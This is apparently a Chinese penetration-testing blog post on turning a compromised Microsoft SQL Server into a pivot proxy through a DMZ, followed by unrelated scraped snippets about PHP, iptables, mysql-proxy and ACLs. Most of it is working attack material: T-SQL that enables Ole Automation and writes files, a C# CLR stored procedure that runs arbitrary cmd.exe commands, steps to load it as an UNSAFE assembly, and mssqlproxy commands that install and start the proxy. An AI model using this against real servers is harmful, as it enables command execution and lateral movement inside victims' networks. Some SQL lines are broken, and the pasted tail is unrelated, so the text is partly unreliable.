相关文章推荐
傲视众生的白开水  ·  resolution - Issue ...·  1 年前    · 

0x00 背景介绍

渗透测试中经常利用数据库连接突破 DMZ,前天看到有分享利用 MSSQL 搭建代理突破 DMZ 访问不出网的应用资产。Microsoft SQL Server 现在具备与 Microsoft Windows .NET Framework 的公共语言运行时 (CLR) 组件集成的功能。CLR 为托管代码提供服务,例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。CLR 可以使用 .NET Framework 语言编写存储过程、触发器、用户定义类型、用户定义函数(标量函数和表值函数)以及用户定义的聚合函数。

0x01 环境部署

数据库服务:

演示环境:Windows Server 2008 R2 Standard

测试机地址:192.168.3.174

MSSQL版本:Microsoft SQL Server 2012 - 11.0.2100.60 (X64)

歪果大佬遇到的场景为获取互联网侧服务器权限后,通过信息收集或者常规渗透控制 MSSQL 数据库。防火墙设置规则只允许1433端口通过,无法访问核心服务器,通过 MSSQL 数据库来构造代理,访问内部资源服务。

0x02 文件操作

开启 sp_OACreate

EXEC master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;
EXEC master.dbo.sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;
 

关闭 sp_OACreate

EXEC sp_configure 'show advanced options',1;reconfigure;
EXEC sp_configure 'ole automation procedures',0;reconfigure;
EXEC sp_configure 'show advanced options',0;reconfigure;
 
DECLARE @o int, @f int, @t int, @ret int
DECLARE @line varchar(8000)
EXEC sp_OACreate 'scripting.filesystemobject',@o out
EXEC sp_OAMethod @o, 'createtextfile', @f out, 'C:\windows\temp\c4.txt', 1
EXEC @ret = sp_OAMethod @f, 'writeline', NULL ,'C4'
 

0x03 命令执行

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.IO;
using System.Diagnostics;
using System.Text;
public partial class StoredProcedures
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void cmd_exec (SqlString execCommand)
        Process proc = new Process();
        proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";
        proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);
        proc.StartInfo.UseShellExecute = false;
        proc.StartInfo.RedirectStandardOutput = true;
        proc.Start();
        // Create the record and specify the metadata for the columns.
        SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));
        // Mark the beginning of the result set.
        SqlContext.Pipe.SendResultsStart(record);
        // Set values for each column in the row
        record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());
        // Send the row back to the client.
        SqlContext.Pipe.SendResultsRow(record);
        // Mark the end of the result set.
        SqlContext.Pipe.SendResultsEnd();
        proc.WaitForExit();
        proc.Close();
 

使用 csc.exe 编译 dll 文件

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library d:\mssqlproxy\cmdexce.cs
 

写入编译的 dll 文件

DECLARE @ob INT;
EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;EXEC sp_OASetProperty @ob, 'Type', 1;
EXEC sp_OAMethod @ob, 'Open';EXEC sp_OAMethod @ob, 'Write', NULL, 
EXEC sp_OAMethod @ob, 'SaveToFile', NULL, 'c:\windows\temp\cmd_exec.dll', 2;
EXEC sp_OAMethod @ob, 'Close';E
XEC sp_OADestroy @ob;
 

执行系统命令

CREATE ASSEMBLY my_assembly
FROM 'C:\windows\temp\cmd_exec.dll'
WITH PERMISSION_SET = UNSAFE;
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];
cmd_exec 'ver'
DROP PROCEDURE cmd_exec
DROP ASSEMBLY my_assembly
 

0x04 环境测试

python mssqlclient.py administrator@192.168.3.174 -windows-auth
 
upload reciclador.dll C:\windows\temp\reciclador.dll
 
python mssqlclient.py administrator@192.168.3.174 -windows-auth -install -clr assembly.dll
 
USE msdb;
SELECT      SCHEMA_NAME(so.[schema_id]) AS [schema_name], 
            af.file_id,              
            af.name + '.dll' as [file_name],
            asmbly.clr_name,
            asmbly.assembly_id,           
            asmbly.name AS [assembly_name], 
            am.assembly_class,
            am.assembly_method,
            so.object_id as [sp_object_id],
            so.name AS [sp_name],
            so.[type] as [sp_type],
            asmbly.permission_set_desc,
            asmbly.create_date,
            asmbly.modify_date,
            af.content                           
FROM        sys.assembly_modules am
INNER JOIN  sys.assemblies asmbly
ON        asmbly.assembly_id = am.assembly_id
INNER JOIN  sys.assembly_files af 
ON       asmbly.assembly_id = af.assembly_id 
INNER JOIN  sys.objects so
ON        so.[object_id] = am.[object_id]
 
python mssqlclient.py administrator@192.168.3.174 -windows-auth -check -reciclador "C:\windows\temp\reciclador.dll"
 
python mssqlclient.py administrator@192.168.3.174 -windows-auth -start -reciclador "C:\windows\temp\reciclador.dll"
 

https://github.com/blackarrowsec/mssqlproxy

https://www.blackarrow.net/mssqlproxy-pivoting-clr/

https://blog.netspi.com/attacking-sql-server-clr-assemblies/

0x00 背景介绍渗透测试中经常利用数据库连接突破 DMZ,前天看到有分享利用 MSSQL 搭建代理突破 DMZ 访问不出网的应用资产。Microsoft SQL Server 现在具备...
现在的PHP-CGI在IIS支持的不错,可以快整部署 在PHP网站下载编译的二进制包(PHP 7.0.6)解压就算安装完成了, 但在Linux下访问MSSQL2014非常容易,反而在Windows 平台下也没有合适的官方组件可使用(PHP 7.0.6没有MSSQL连接组件) 与是用C#编写了一个SocketServer进行数据库的读写操作 PHPService.cs 负责侦听 ClientService.cs 负责业务解析 DatabaseHelper.cs 负责数据库操作 安装成服务后PHP就可以通过socket访问了非常方便
• Linux 系统的防火墙: IP信息包过滤系统,它实际上由两个组件netfilter和iptables组成 • 主要工作在网络层,针对IP数据包。体现在对包内的IP地址、端口等信息的处理上 2、netfilter netfilter属于“内核态”(Kernel Space,又称为内核空间)的防火墙功能体系; 是内核的一部分,由一些数据包过滤表组成,这些表包含内核用来控制数据包过滤处理的规则集。 3、iptables iptables属于“用户态”(User Spac
mysql-proxy简介 mysql-proxy是mysql官方提供的mysql中间件服务,上游可接入若干个mysql-client,后端可连接若干个mysql-server。它使用mysql协议,任何使用mysql-client的上游无需修改任何代码,即可迁移至mysql-proxy上。mysql-proxy最基本的用法,就是作为一个请求拦截,请求中转的中间层: 进一步的,mysql-proxy可以分析与修改请求。拦截查询和修改结果,需要通过编写Lua脚本来完成。mysql-proxy允许用户指定L
访问控制列表(ACL)是一种基于包过滤的访问控制技术,它可以根据设定的条件对接口上的数据包进行过滤,允许其通过或丢弃。 访问控制列表被广泛地应用于路由器和三层交换机,借助于访问控制列表,可以有效地控制用户对网络访问,从而最大程度地保障网络安全。 虚拟终端(Virtual Teletype Terminal),用于实现远程登录路由器进行管理配置。 http://www.luyouqiwang.net/luyouqixiansu451.html
mssql代理 mssqlproxy是一个工具包,旨在通过套接字重用通过受损的Microsoft SQL Server在受限的环境中执行横向移动。客户端需要SQL Server上的和sysadmin特权。 在继续之前,请仔细阅读。 它包括三个部分: CLR汇编:编译assembly.cs 核心DLL :编译reciclador.sln 客户端:mssqlclient.py(基于Impacket的示例) 您可以编译库或从(x64)下载它们。 要生成核心DLL,只需将项目导入Visual Studio(reciclador.sln)并进行编译。 要生成CLR程序集,首先需要找到C#编译器: Get-ChildItem - Recurse " C:\Windows\Microsoft.NET\ " - Filter " csc.exe " | Sort-Object fullname
一般来说,不建议将 MySQL 数据库直接部署在 DMZ 区,因为 MySQL 数据库包含了大量的敏感信息,如用户密码、企业资产等。将 MySQL 数据库直接暴露在 DMZ 区域会增加数据库被攻击的风险。攻击者可以通过各种手段,比如利用漏洞、暴力破解等方式,尝试获取数据库的敏感信息,从而威胁企业的安全。 如果确实需要将 MySQL 数据库部署在 DMZ 区域,可以考虑采取以下措施: 1.使用防火墙进行保护:可以通过配置防火墙规则,限制只允许特定的 IP 地址或者端口访问 MySQL 数据库,以减少安全风险。 2.使用 VPN 或者 SSH 隧道进行访问:可以通过 VPN 或者 SSH 隧道等方式,在安全的内部网络访问 MySQL 数据库,从而保证数据库的安全性。 3.限制 MySQL 用户的权限:可以根据用户的职责和工作范围,按需分配权限,避免出现不必要的安全风险。 综上所述,在保证安全的前提下,可以将 MySQL 数据库部署在 DMZ 区,但是需要特别注意安全防护措施,并根据实际情况进行具体的安全策略。